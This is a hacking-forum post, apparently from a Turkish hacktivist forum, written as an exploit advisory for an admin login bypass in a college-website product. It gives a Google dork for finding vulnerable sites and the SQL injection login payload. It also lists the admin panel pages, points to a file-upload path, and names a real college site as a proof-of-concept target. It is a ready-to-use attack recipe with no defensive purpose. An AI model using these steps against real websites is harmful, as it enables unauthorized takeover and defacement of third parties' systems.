Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Design By Dr. Hardik Desai Chirag Lad Admin Bypass Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 46 / 100
Rep Sayısı: 2874
Mesaj Sayısı: 6512
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Design By Dr. Hardik Desai Chirag Lad Admin Bypass Vuln
29.06.2018 02:46
################################################################################​#################

# Exploit Title : Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : chiraglad.in
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]

################################################################################​#################

# Google Dork : intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad''

# Administration Control Panel Path => /admin/

# Exploit : Both are correct login credentials [ '=''or' ] or [ anything' OR 'x'='x ]

Username : anything' OR 'x'='x

Password : anything' OR 'x'='x

Useable Administration Control Panel URL Links =>

/admin/dashboard.php
/admin/about_index.php
/admin/about_edit.php
/admin/trustees_index.php
/admin/trustees_edit.php
/admin/facilities_index.php
/admin/facilities_edit.php
/admin/college_index.php
/admin/college_edit.php
/admin/course_edit.php
/admin/course_index.php
/admin/coursecontent_index.php
/admin/coursecontent_create.php
/admin/faculty_index.php
/admin/faculty_edit.php
/admin/comittees_index.php
/admin/comittees_create.php
/admin/activitymenu_index.php
/admin/activitymaster_index.php
/admin/activitymaster_edit.php
/admin/activitysub_index.php
/admin/activitysub_edit.php
/admin/activityrecords_index.php
/admin/activityrecords_edit.php
/admin/awardscategory_index.php
/admin/awards_index.php
/admin/awards_edit.php
/admin/placementmenu_index.php
/admin/placementmenu_edit.php
/admin/placement_index.php
/admin/placement_create.php
/admin/contact_details.php
/admin/alumni_details.php
/admin/news_index.php
/admin/news_create.php
/admin/staff_index.php
/admin/staff_create.php
/admin/change_password.php

Uploaded Files Path through Admin Panel =>

/admin/uploaded_files/[RANDOM-NUMBERS-ALPAHETS-yourfilename.png] .jpg .gif .pdf .html .htm shtml.jpg

################################################################################​#################

# Example Site => naranlalacollege.in => [ Proof of Concept for the Vulnerability ] => archive.is/4mYlj

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi